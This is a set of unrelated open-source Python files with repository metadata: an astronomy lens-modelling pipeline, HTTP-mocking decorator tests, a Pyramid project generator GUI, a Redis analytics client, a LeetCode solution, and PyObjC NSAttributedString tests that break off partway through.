b6df2c47c2e660f59205c497b027827cc1e83442 | 52e83d67c8b76f83278b61a4c0787abebfa2423c | /DeepLense/Shubham Jain/pipelines/beginner/features/redshifts_lens_and_source.py | f7fbc9325206394e42474457af943383399ac661 | [] | no_license | mlsft/gsc_tasks- | 3935142c93cebc978ff35e3f37486438c4dceeed | 84b62aa04f2333d26f8f95a7c0b24c3922bac647 | refs/heads/master | 2022-04-13T16:22:18.054908 | 2020-04-14T11:59:45 | 2020-04-14T11:59:45 | 249,394,940 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,271 | py | import autofit as af
import autolens as al
### PIPELINE DESCRIPTION ###
# In this pipeline, we'll demonstrate passing redshifts to a pipeline - which means that the results and images of this
# pipeline will be returned in physical unit_label (e.g. lengths in kpcs as well as arcsec, luminosities in magnitudes,
# masses in solMass, etc).
# The redshift of the lens and source are input parameters of all pipelines, and they take default values of 0.5 and
# 1.0. Thus, *all* pipelines will return physical values assuming these fiducial values if no other values are
# specified. Care must be taken interpreting the distances and masses if these redshifts are not correct or if the
# true redshifts of the lens and / or source galaxies are unknown.
# We'll perform a basic analysis which fits a lensed source galaxy using a parametric light profile where
# the lens's light is omitted. This pipeline uses two phases:
# Phase 1:
# Description: Fit the lens mass model and source light profile using x1 source.
# Lens Mass: EllipticalIsothermal + ExternalShear
# Source Light: EllipticalSersic
# Prior Passing: None
# Notes: Inputs the pipeline default redshifts where the lens has redshift 0.5, source 1.0.
# Phase 1:
# Description: Fit the lens and source model again..
# Lens Mass: EllipticalIsothermal + ExternalShear
# Source Light: EllipticalSersic
# Prior Passing: Lens mass (model -> phase 1), source light (model -> phase 1)
# Notes: Manually over-rides the lens redshift to 1.0 and source redshift to 2.0, to illustrate the different results.
def make_pipeline(phase_folders=None, redshift_lens=0.5, redshift_source=1.0):
    """Build the two-phase demo pipeline illustrating redshift passing.

    :param phase_folders: list of folder names used to build the output path;
        the pipeline name and tag are appended to it (mutated in place).
    :param redshift_lens: lens-galaxy redshift used in phase 1 (default 0.5).
    :param redshift_source: source-galaxy redshift used in phase 1 (default 1.0).
    :return: an ``al.PipelineDataset`` containing both phases.
    """
    ### SETUP PIPELINE & PHASE NAMES, TAGS AND PATHS ###
    # We setup the pipeline name using the tagging module. In this case, the pipeline name is not given a tag and
    # will be the string specified below. However, its good practise to use the 'tag.' function below, incase
    # a pipeline does use customized tag names.
    pipeline_name = "pipeline__feature"
    pipeline_tag = "redshifts"
    # Unlike other features, the redshifts of the lens and source do not change the setup tag and phase path. Thus,
    # our output will simply go to the phase path:
    # phase_path = 'phase_name/setup'
    # This function uses the phase folders and pipeline name to set up the output directory structure,
    # e.g. 'autolens_workspace/output/pipeline_name/pipeline_tag/phase_name/phase_tag//'
    phase_folders.append(pipeline_name)
    phase_folders.append(pipeline_tag)
    ### PHASE 1 ###
    # In phase 1, we fit the lens galaxy's mass and one source galaxy, where we:
    # 1) Use the input value of redshifts from the pipeline.
    mass = af.PriorModel(al.mp.EllipticalIsothermal)
    mass.centre_0 = af.GaussianPrior(mean=0.0, sigma=0.1)
    mass.centre_1 = af.GaussianPrior(mean=0.0, sigma=0.1)
    phase1 = al.PhaseImaging(
        phase_name="phase_1__x1_source",
        phase_folders=phase_folders,
        galaxies=dict(
            lens=al.GalaxyModel(
                redshift=redshift_lens, mass=mass, shear=al.mp.ExternalShear
            ),
            source_0=al.GalaxyModel(
                redshift=redshift_source, sersic=al.lp.EllipticalSersic
            ),
        ),
    )
    phase1.optimizer.const_efficiency_mode = True
    phase1.optimizer.n_live_points = 80
    phase1.optimizer.sampling_efficiency = 0.2
    ### PHASE 2 ###
    # In phase 2, we fit the lens galaxy's mass and two source galaxies, where we:
    # 1) Use manually specified new values of redshifts for the lens and source galaxies.
    phase2 = al.PhaseImaging(
        phase_name="phase_2__x2_source",
        phase_folders=phase_folders,
        galaxies=dict(
            lens=al.GalaxyModel(
                redshift=1.0,
                mass=phase1.result.model.galaxies.lens.mass,
                shear=phase1.result.model.galaxies.lens.shear,
            ),
            source=al.GalaxyModel(
                redshift=2.0, sersic=phase1.result.model.galaxies.source.sersic
            ),
        ),
    )
    phase2.optimizer.const_efficiency_mode = True
    phase2.optimizer.n_live_points = 50
    phase2.optimizer.sampling_efficiency = 0.3
    return al.PipelineDataset(pipeline_name, phase1, phase2)
| [
"[email protected]"
] | |
4856bde0b0b864ee66218ab2cf5abb1934f118c2 | 27bdcba25df8b2416783d8a1229bfce08dc77189 | /tests/util/httpretty/test_decorator.py | d2ccd74525dfd97109047417dea28c64ee280b8a | [
"Apache-2.0"
] | permissive | BenjamenMeyer/stackInABox | 5fbeab6aac38c52d5360f9dbabb9101447e32eb5 | 15586e61a2013b6f4997c652e8412a1784f8fc93 | refs/heads/master | 2022-04-01T01:04:33.103603 | 2021-01-09T05:52:55 | 2021-01-09T05:52:55 | 30,074,880 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,522 | py | """
Stack-In-A-Box: Basic Test
"""
import collections
import sys
import types
import unittest
import requests
from stackinabox.util.httpretty import decorator
from tests.util import base
from tests.utils.services import AdvancedService
from tests.utils.hello import HelloService
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorErrors(base.UtilTestCase):
    """Error handling and deprecated entry points of the httpretty decorator."""
    def test_basic(self):
        # process_service() must reject a non-service object when asked to
        # raise on bad types.
        decor_instance = decorator.activate('localhost')
        with self.assertRaises(TypeError):
            decor_instance.process_service({}, raise_on_type=True)
    @decorator.stack_activate('localhost', HelloService())
    def test_deprecated(self):
        # The deprecated stack_activate alias should still stub the service.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Hello')
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecorator(base.UtilTestCase):
    """HelloService stubbed via the decorator, passed as a single instance."""
    @decorator.activate('localhost', HelloService())
    def test_basic(self):
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Hello')
    @decorator.activate('localhost', HelloService(),
                        200, value='Hello')
    def test_basic_with_parameters(self, response_code, value='alpha'):
        # Extra decorator args/kwargs are forwarded to the test method.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
    @decorator.activate('localhost', HelloService(),
                        200, value='Hello',
                        access_services="stack")
    def test_basic_with_stack_acccess(self, response_code, value='alpha',
                                      stack=None):
        # access_services injects the service dict under the named kwarg.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
        self.assertEqual(len(stack), 1)
        self.assertTrue(self.hello_service.name in stack)
        self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyAdvancedWithDecorator(base.UtilTestCase):
    """Exercises AdvancedService routes: static, regex, and query handling."""
    @decorator.activate('localhost', AdvancedService())
    def test_basic(self):
        res = requests.get('http://localhost/advanced/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Hello')
        res = requests.get('http://localhost/advanced/h')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Good-Bye')
        expected_result = {
            'bob': 'bob: Good-Bye alice',
            'alice': 'alice: Good-Bye bob',
            'joe': 'joe: Good-Bye jane'
        }
        # Query-string parameters are echoed back as a JSON mapping.
        res = requests.get('http://localhost/advanced/g?bob=alice;'
                           'alice=bob&joe=jane')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.json(), expected_result)
        res = requests.get('http://localhost/advanced/1234567890')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'okay')
        # Non-matching path -> service-specific 595 error.
        res = requests.get('http://localhost/advanced/_234567890')
        self.assertEqual(res.status_code, 595)
        # Wrong HTTP method on a known route -> 405.
        res = requests.put('http://localhost/advanced/h')
        self.assertEqual(res.status_code, 405)
        # Unknown service root -> 597.
        res = requests.put('http://localhost/advanced2/i')
        self.assertEqual(res.status_code, 597)
def httpretty_generator():
    """Yield the stub services one-by-one (exercises generator input)."""
    yield HelloService()
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorAndGenerator(base.UtilTestCase):
    """Same decorator scenarios, but the services are supplied by a generator."""
    def test_verify_generator(self):
        # Sanity check: the helper really does return a generator object.
        self.assertIsInstance(httpretty_generator(), types.GeneratorType)
    @decorator.activate(
        'localhost',
        httpretty_generator()
    )
    def test_basic(self):
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Hello')
    @decorator.activate(
        'localhost',
        httpretty_generator(),
        200, value='Hello'
    )
    def test_basic_with_parameters(self, response_code, value='alpha'):
        # Extra decorator args/kwargs are forwarded to the test method.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
    @decorator.activate(
        'localhost',
        httpretty_generator(),
        200, value='Hello',
        access_services="stack"
    )
    def test_basic_with_stack_acccess(self, response_code, value='alpha',
                                      stack=None):
        # access_services injects the service dict under the named kwarg.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
        self.assertEqual(len(stack), 1)
        self.assertTrue(self.hello_service.name in stack)
        self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
def httpretty_list():
    """Return the stub services as a plain list (exercises list input)."""
    return [
        HelloService()
    ]
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorAndList(base.UtilTestCase):
    """Same decorator scenarios, but the services are supplied as a list."""
    def test_verify_list(self):
        # Sanity check: the helper returns an iterable of services.
        # NOTE(review): collections.Iterable is removed in Python 3.10+,
        # but this whole class is skipped on Python 3 anyway.
        self.assertIsInstance(httpretty_list(), collections.Iterable)
    @decorator.activate(
        'localhost',
        httpretty_list()
    )
    def test_basic(self):
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, 200)
        self.assertEqual(res.text, 'Hello')
    @decorator.activate(
        'localhost',
        httpretty_list(),
        200, value='Hello'
    )
    def test_basic_with_parameters(self, response_code, value='alpha'):
        # Extra decorator args/kwargs are forwarded to the test method.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
    @decorator.activate(
        'localhost',
        httpretty_list(),
        200, value='Hello',
        access_services="stack"
    )
    def test_basic_with_stack_acccess(self, response_code, value='alpha',
                                      stack=None):
        # access_services injects the service dict under the named kwarg.
        res = requests.get('http://localhost/hello/')
        self.assertEqual(res.status_code, response_code)
        self.assertEqual(res.text, value)
        self.assertEqual(len(stack), 1)
        self.assertTrue(self.hello_service.name in stack)
        self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
| [
"[email protected]"
] | |
44169eb3847ec870ceabdbf7343dc31c946a5041 | ba2eea85cef560c54d5cb4af0e4f2c7c3ee3eb2f | /nesfr3_workspace/catkin_ws/devel/lib/python2.7/dist-packages/hdl_people_tracking/msg/__init__.py | 25469b939f284ee573515fba8efc8d24068cf7de | [] | no_license | HiSeun/nesfr3_selfwork | 0c782597ffd66d736d53ae05594d23fa7f1d9a85 | 855d43117a235462335c6693b334e7a6235d1d31 | refs/heads/master | 2023-02-08T07:33:15.637998 | 2021-01-05T08:48:45 | 2021-01-05T08:48:45 | 326,935,430 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | from ._Cluster import *
from ._ClusterArray import *
from ._Track import *
from ._TrackArray import *
| [
"[email protected]"
] | |
8746be1fd3b410f5feea5dc25408026a13c2840a | b5445f9a1f3597472f47df89696465bca7735406 | /app/program.py | fbad7d4d00617fce1af32fa10d72252d695d045e | [
"MIT"
] | permissive | mikeckennedy/pyramid-web-builder-python-gui | 8af5a4dde9ff1bd6173f789464b67bdaba8bd3fa | d842e116730e9b0ed9daaf1125e1fb6e2b3ea40e | refs/heads/master | 2021-05-03T11:00:32.390158 | 2018-02-17T16:12:56 | 2018-02-17T16:12:56 | 120,542,873 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,867 | py | import cookiecutter.main
import sys
from gooey import Gooey, GooeyParser
from utils import to_project_style
@Gooey(
    program_name='Pyramid app builder',
    program_description='Create a Pyramid web app',
    show_success_modal=False,
    requires_shell=False)
def main():
    """GUI entry point: collect the user's choices, then scaffold the project."""
    info = get_user_values()
    proj_dir = build_app(info)
    print("Project created: {}".format(proj_dir))
def get_user_values():
    """Build the Gooey form and return the parsed user selections.

    Returns an argparse Namespace with ``template``, ``project_name``,
    ``template_language`` and ``working_dir`` attributes.
    """
    parser = GooeyParser()
    parser.add_argument(dest='template',
                        metavar='Project type',
                        help="Type of Pyramid project",
                        choices=['Starter', "Talk Python Entrepreneur's", 'SQLAlchemy', 'SubstanceD', 'ZODB'])
    parser.add_argument('project_name',
                        metavar='Project name',
                        help="The user-visible name of your project")
    parser.add_argument(
        dest='template_language',
        metavar='Template language',
        widget='Dropdown',
        choices=["jinja2", "chameleon", "mako"]
    )
    parser.add_argument(
        dest="working_dir",
        metavar='Output directory',
        help='Directory for project',
        widget="DirChooser")
    sysargs = sys.argv[1:]
    args = parser.parse_args(sysargs)
    return args
def template_to_url(template_name: str) -> str:
    """Map a user-facing Pyramid project type to its cookiecutter repo URL.

    :param template_name: one of the choices offered by the GUI.
    :raises ValueError: if ``template_name`` is not a known project type.
    """
    urls = {
        'Starter': 'https://github.com/Pylons/pyramid-cookiecutter-starter',
        'SQLAlchemy': 'https://github.com/Pylons/pyramid-cookiecutter-alchemy',
        'SubstanceD': 'https://github.com/Pylons/substanced-cookiecutter',
        "Talk Python Entrepreneur's":
            'https://github.com/mikeckennedy/cookiecutter-pyramid-talk-python-starter',
        # Bug fix: 'ZODB' is offered in the GUI choices but previously fell
        # through to the "Unknown template type" error.
        'ZODB': 'https://github.com/Pylons/pyramid-cookiecutter-zodb',
    }
    try:
        return urls[template_name]
    except KeyError:
        # ValueError is still an Exception subclass, so existing broad
        # handlers keep working.
        raise ValueError("Unknown template type: {}".format(template_name))
def build_app(info):
    """Run cookiecutter non-interactively and return the created project dir.

    ``extra_context`` pre-answers the template prompts; most of the extra
    keys look specific to the Talk Python template and are presumably
    ignored by the other templates -- TODO confirm against each template's
    cookiecutter.json.
    """
    template = template_to_url(info.template)
    proj_dir = cookiecutter.main.cookiecutter(
        template,
        no_input=True,
        output_dir=info.working_dir,
        extra_context={
            'project_name': info.project_name,
            'repo_name': to_project_style(info.project_name),
            'template_language': info.template_language,
            "project_slug": to_project_style(info.project_name),
            "contact_name": "Company Name",
            "domain_name": "yourcompany.com",
            "contact_email": "[email protected]",
            "description": "",
            "integrations": "",
            "mailchimp_api": "",
            "mailchimp_list_id": "",
            "outbound_smtp_username": "",
            "outbound_smtp_password": "",
            "outbound_smtp_server": "",
            "outbound_smtp_port": "587",
            "rollbar_access_token": ""
        }
    )
    return proj_dir
if __name__ == '__main__':
sys.exit(main())
| [
"[email protected]"
] | |
411345c0f65612ba6ffbc7676affbf602610f570 | b639cc785f3e548c77090fb8d2bc35d5aebfa27c | /tests/test_patterns/test_des.py | 79d37243bb32adcaed183884512f9af4dcd4d33f | [] | no_license | jmcarp/neurotrends | 92b7c33a0fe7a216af4cbbb5d4d26f8ee051286e | 724c06f6a31ecfe37780b51038b3367cd501be37 | refs/heads/master | 2016-09-05T15:49:35.435697 | 2014-11-02T04:27:21 | 2014-11-02T04:27:21 | 6,889,235 | 6 | 3 | null | 2014-10-19T18:33:44 | 2012-11-27T19:15:19 | Python | UTF-8 | Python | false | false | 433 | py | # -*- coding: utf-8 -*-
import pytest
from neurotrends.pattern import des
from . import check_taggers
@pytest.mark.parametrize('input, expected', [
    # Positives
    ('block design', {}),
    ('blocked paradigm', {}),
    ('epoch based', {}),
    ('epoched analysis', {}),
    # PMID 21625502
    ('we used a blocked factorial design', {}),
])
def test_block(input, expected):
    """Each phrase should match the block-design tagger with no extra groups."""
    check_taggers([des.block], input, expected)
| [
"[email protected]"
] | |
50ed4c1e4c8f3a3d0004a7364916f829ebeb823e | e831c22c8834030c22c54b63034e655e395d4efe | /171-ExcelSheetColumnNumber.py | b0ecffe70dcf519041cda5b5ec7b971faf11ca34 | [] | no_license | szhmery/leetcode | a5eb1a393422b21f9fd4304b3bdc4a9db557858c | 9fcd1ec0686db45d24e2c52a7987d58c6ef545a0 | refs/heads/master | 2023-08-16T00:27:56.866626 | 2021-10-23T07:35:37 | 2021-10-23T07:35:37 | 331,875,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | class Solution:
def titleToNumber(self, columnTitle: str) -> int:
ans = 0
for char in columnTitle:
num = ord(char) - ord('A') + 1
ans = ans * 26 + num
return ans
if __name__ == '__main__':
    # Ad-hoc smoke test: "FXSHRXW" -> 2147483647, "ZY" -> 701.
    solution = Solution()
    result = solution.titleToNumber("FXSHRXW")
    print(result)
    result = solution.titleToNumber("ZY")
    print(result)
"[email protected]"
] | |
f4b2a1dbd9240673bd7048d07490b2712b5479ef | 4578b30c433510cf370d51475ec11cac9c3de1cb | /serpent/analytics_client.py | f7cc26e803be8a25bf0c6da550b983ec00c7ca18 | [
"MIT"
] | permissive | SerpentAI/SerpentAI | 0a5b2d567b50388722c3a3c5152555ce94256c49 | 00a487dd088c6ca2528d025f3273c0a796efe210 | refs/heads/dev | 2023-03-08T14:14:07.171435 | 2020-05-22T22:34:09 | 2020-05-22T22:34:09 | 88,444,621 | 7,216 | 950 | MIT | 2020-07-15T00:41:35 | 2017-04-16T21:48:39 | Python | UTF-8 | Python | false | false | 1,395 | py | from redis import StrictRedis
from datetime import datetime
from pprint import pprint
from serpent.config import config
import json
class AnalyticsClientError(BaseException):
    """Raised when the analytics client is misconfigured (e.g. missing key)."""
    pass
class AnalyticsClient:
    """Publishes analytics events for one project onto a Redis list."""
    def __init__(self, project_key=None):
        """
        :param project_key: identifier for the project the events belong to.
        :raises AnalyticsClientError: if no project key is supplied.
        """
        if project_key is None:
            raise AnalyticsClientError("'project_key' kwarg is expected...")
        self.project_key = project_key
        self.redis_client = StrictRedis(**config["redis"])
        # Behaviour flags come from the global config; broadcasting to Redis
        # and debug printing are both off by default.
        self.broadcast = config["analytics"].get("broadcast", False)
        self.debug = config["analytics"].get("debug", False)
        # None means "track every event"; otherwise only whitelisted keys.
        self.event_whitelist = config["analytics"].get("event_whitelist")
    @property
    def redis_key(self):
        # Redis list that receives this project's serialized events.
        return f"SERPENT:{self.project_key}:EVENTS"
    def track(self, event_key=None, data=None, timestamp=None, is_persistable=True):
        """Record one event: pretty-print when debugging, LPUSH the JSON
        payload to Redis when broadcasting. Events are silently dropped when
        a whitelist is configured and ``event_key`` is not on it.
        """
        if self.event_whitelist is None or event_key in self.event_whitelist:
            event = {
                "project_key": self.project_key,
                "event_key": event_key,
                "data": data,
                # Default to the current UTC time if no timestamp is given.
                "timestamp": timestamp if timestamp is not None else datetime.utcnow().isoformat(),
                "is_persistable": is_persistable
            }
            if self.debug:
                pprint(event)
            if self.broadcast:
                self.redis_client.lpush(self.redis_key, json.dumps(event))
| [
"[email protected]"
] | |
6f69f90944511a4dd09b85444b506dbc254f8afb | 8f8ac99fd3ed9ceb36778b404f6fdd0b6899d3f4 | /pyobjc-framework-Cocoa/PyObjCTest/test_nsattributedstring.py | b340f942563363e10e7fc3227d6dd2846b890741 | [
"MIT"
] | permissive | strogo/pyobjc | ac4201c7742eb75348328eeecb7eedf4e3458de3 | 2579c5eaf44b0c5af77ee195c417d2c65e72dfda | refs/heads/master | 2023-07-13T00:41:56.448005 | 2021-08-24T06:42:53 | 2021-08-24T06:42:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,273 | py | import objc
import Foundation
import AppKit
from PyObjCTools.TestSupport import TestCase, min_os_level
class TestNSAttributedString(TestCase):
    def testMethodsFoundation(self):
        """Verify PyObjC bridge metadata for NSAttributedString methods."""
        # These range arguments are declared as out-parameters in the
        # bridge metadata.
        self.assertArgIsOut(
            AppKit.NSAttributedString.attributesAtIndex_effectiveRange_, 1
        )
        self.assertArgIsOut(
            AppKit.NSAttributedString.attributesAtIndex_longestEffectiveRange_inRange_,
            1,
        )
        self.assertArgIsOut(
            AppKit.NSAttributedString.attribute_atIndex_longestEffectiveRange_inRange_,
            2,
        )
        # isEqualToAttributedString: must be exposed as returning a BOOL.
        self.assertResultIsBOOL(AppKit.NSAttributedString.isEqualToAttributedString_)
def testConstantsAppKit(self):
self.assertIsInstance(AppKit.NSManagerDocumentAttribute, str)
self.assertIsInstance(AppKit.NSFontAttributeName, str)
self.assertIsInstance(AppKit.NSParagraphStyleAttributeName, str)
self.assertIsInstance(AppKit.NSForegroundColorAttributeName, str)
self.assertIsInstance(AppKit.NSUnderlineStyleAttributeName, str)
self.assertIsInstance(AppKit.NSSuperscriptAttributeName, str)
self.assertIsInstance(AppKit.NSBackgroundColorAttributeName, str)
self.assertIsInstance(AppKit.NSAttachmentAttributeName, str)
self.assertIsInstance(AppKit.NSLigatureAttributeName, str)
self.assertIsInstance(AppKit.NSBaselineOffsetAttributeName, str)
self.assertIsInstance(AppKit.NSKernAttributeName, str)
self.assertIsInstance(AppKit.NSLinkAttributeName, str)
self.assertIsInstance(AppKit.NSStrokeWidthAttributeName, str)
self.assertIsInstance(AppKit.NSStrokeColorAttributeName, str)
self.assertIsInstance(AppKit.NSUnderlineColorAttributeName, str)
self.assertIsInstance(AppKit.NSStrikethroughStyleAttributeName, str)
self.assertIsInstance(AppKit.NSStrikethroughColorAttributeName, str)
self.assertIsInstance(AppKit.NSShadowAttributeName, str)
self.assertIsInstance(AppKit.NSObliquenessAttributeName, str)
self.assertIsInstance(AppKit.NSExpansionAttributeName, str)
self.assertIsInstance(AppKit.NSCursorAttributeName, str)
self.assertIsInstance(AppKit.NSToolTipAttributeName, str)
self.assertIsInstance(AppKit.NSCharacterShapeAttributeName, str)
self.assertIsInstance(AppKit.NSGlyphInfoAttributeName, str)
self.assertIsInstance(AppKit.NSMarkedClauseSegmentAttributeName, str)
self.assertIsInstance(AppKit.NSSpellingStateAttributeName, str)
self.assertEqual(AppKit.NSUnderlineStyleNone, 0x00)
self.assertEqual(AppKit.NSUnderlineStyleSingle, 0x01)
self.assertEqual(AppKit.NSUnderlineStyleThick, 0x02)
self.assertEqual(AppKit.NSUnderlineStyleDouble, 0x09)
self.assertEqual(AppKit.NSUnderlinePatternSolid, 0x0000)
self.assertEqual(AppKit.NSUnderlinePatternDot, 0x0100)
self.assertEqual(AppKit.NSUnderlinePatternDash, 0x0200)
self.assertEqual(AppKit.NSUnderlinePatternDashDot, 0x0300)
self.assertEqual(AppKit.NSUnderlinePatternDashDotDot, 0x0400)
self.assertIsInstance(AppKit.NSUnderlineByWordMask, int)
self.assertEqual(AppKit.NSSpellingStateSpellingFlag, 1)
self.assertEqual(AppKit.NSSpellingStateGrammarFlag, 2)
self.assertIsInstance(AppKit.NSPlainTextDocumentType, str)
self.assertIsInstance(AppKit.NSRTFTextDocumentType, str)
self.assertIsInstance(AppKit.NSRTFDTextDocumentType, str)
self.assertIsInstance(AppKit.NSMacSimpleTextDocumentType, str)
self.assertIsInstance(AppKit.NSHTMLTextDocumentType, str)
self.assertIsInstance(AppKit.NSDocFormatTextDocumentType, str)
self.assertIsInstance(AppKit.NSWordMLTextDocumentType, str)
self.assertIsInstance(AppKit.NSWebArchiveTextDocumentType, str)
self.assertIsInstance(AppKit.NSOfficeOpenXMLTextDocumentType, str)
self.assertIsInstance(AppKit.NSOpenDocumentTextDocumentType, str)
self.assertIsInstance(AppKit.NSPaperSizeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSLeftMarginDocumentAttribute, str)
self.assertIsInstance(AppKit.NSRightMarginDocumentAttribute, str)
self.assertIsInstance(AppKit.NSTopMarginDocumentAttribute, str)
self.assertIsInstance(AppKit.NSBottomMarginDocumentAttribute, str)
self.assertIsInstance(AppKit.NSViewSizeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSViewZoomDocumentAttribute, str)
self.assertIsInstance(AppKit.NSViewModeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSDocumentTypeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSReadOnlyDocumentAttribute, str)
self.assertIsInstance(AppKit.NSConvertedDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCocoaVersionDocumentAttribute, str)
self.assertIsInstance(AppKit.NSBackgroundColorDocumentAttribute, str)
self.assertIsInstance(AppKit.NSHyphenationFactorDocumentAttribute, str)
self.assertIsInstance(AppKit.NSDefaultTabIntervalDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCharacterEncodingDocumentAttribute, str)
self.assertIsInstance(AppKit.NSTitleDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCompanyDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCopyrightDocumentAttribute, str)
self.assertIsInstance(AppKit.NSSubjectDocumentAttribute, str)
self.assertIsInstance(AppKit.NSAuthorDocumentAttribute, str)
self.assertIsInstance(AppKit.NSKeywordsDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCommentDocumentAttribute, str)
self.assertIsInstance(AppKit.NSEditorDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCreationTimeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSModificationTimeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSExcludedElementsDocumentAttribute, str)
self.assertIsInstance(AppKit.NSTextEncodingNameDocumentAttribute, str)
self.assertIsInstance(AppKit.NSPrefixSpacesDocumentAttribute, str)
self.assertIsInstance(AppKit.NSDocumentTypeDocumentOption, str)
self.assertIsInstance(AppKit.NSDefaultAttributesDocumentOption, str)
self.assertIsInstance(AppKit.NSCharacterEncodingDocumentOption, str)
self.assertIsInstance(AppKit.NSTextEncodingNameDocumentOption, str)
self.assertIsInstance(AppKit.NSBaseURLDocumentOption, str)
self.assertIsInstance(AppKit.NSTimeoutDocumentOption, str)
self.assertIsInstance(AppKit.NSWebPreferencesDocumentOption, str)
self.assertIsInstance(AppKit.NSWebResourceLoadDelegateDocumentOption, str)
self.assertIsInstance(AppKit.NSTextSizeMultiplierDocumentOption, str)
self.assertEqual(AppKit.NSNoUnderlineStyle, 0)
self.assertEqual(AppKit.NSSingleUnderlineStyle, 1)
self.assertIsInstance(AppKit.NSUnderlineStrikethroughMask, int)
def testMethodsAppKit(self):
self.assertResultIsBOOL(AppKit.NSAttributedString.containsAttachments)
self.assertArgIsBOOL(AppKit.NSAttributedString.nextWordFromIndex_forward_, 1)
self.assertArgIsOut(AppKit.NSAttributedString.URLAtIndex_effectiveRange_, 1)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithURL_options_documentAttributes_error_, 2
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithURL_options_documentAttributes_error_, 3
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithData_options_documentAttributes_error_, 2
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithData_options_documentAttributes_error_, 3
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithPath_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithURL_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithRTF_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithRTFD_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithHTML_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithHTML_options_documentAttributes_, 2
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithHTML_baseURL_documentAttributes_, 2
)
self.assertArgIsOut(
AppKit.NSAttributedString.initWithRTFDFileWrapper_documentAttributes_, 1
)
self.assertArgIsOut(
AppKit.NSAttributedString.dataFromRange_documentAttributes_error_, 2
)
self.assertArgIsOut(
AppKit.NSAttributedString.fileWrapperFromRange_documentAttributes_error_, 2
)
self.assertResultIsBOOL(
AppKit.NSMutableAttributedString.readFromURL_options_documentAttributes_error_
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromURL_options_documentAttributes_error_,
2,
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromURL_options_documentAttributes_error_,
3,
)
self.assertResultIsBOOL(
AppKit.NSMutableAttributedString.readFromData_options_documentAttributes_error_
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromData_options_documentAttributes_error_,
2,
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromData_options_documentAttributes_error_,
3,
)
self.assertResultIsBOOL(
AppKit.NSMutableAttributedString.readFromURL_options_documentAttributes_
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromURL_options_documentAttributes_, 2
)
self.assertResultIsBOOL(
AppKit.NSMutableAttributedString.readFromData_options_documentAttributes_
)
self.assertArgIsOut(
AppKit.NSMutableAttributedString.readFromData_options_documentAttributes_, 2
)
@min_os_level("10.6")
def testConstants10_6(self):
self.assertEqual(AppKit.NSAttributedStringEnumerationReverse, 1 << 1)
self.assertEqual(
AppKit.NSAttributedStringEnumerationLongestEffectiveRangeNotRequired,
1 << 20,
)
self.assertIsInstance(AppKit.NSWritingDirectionAttributeName, str)
self.assertIsInstance(AppKit.NSFileTypeDocumentAttribute, str)
self.assertIsInstance(AppKit.NSCategoryDocumentAttribute, str)
self.assertIsInstance(AppKit.NSFileTypeDocumentOption, str)
@min_os_level("10.7")
def testConstants10_7(self):
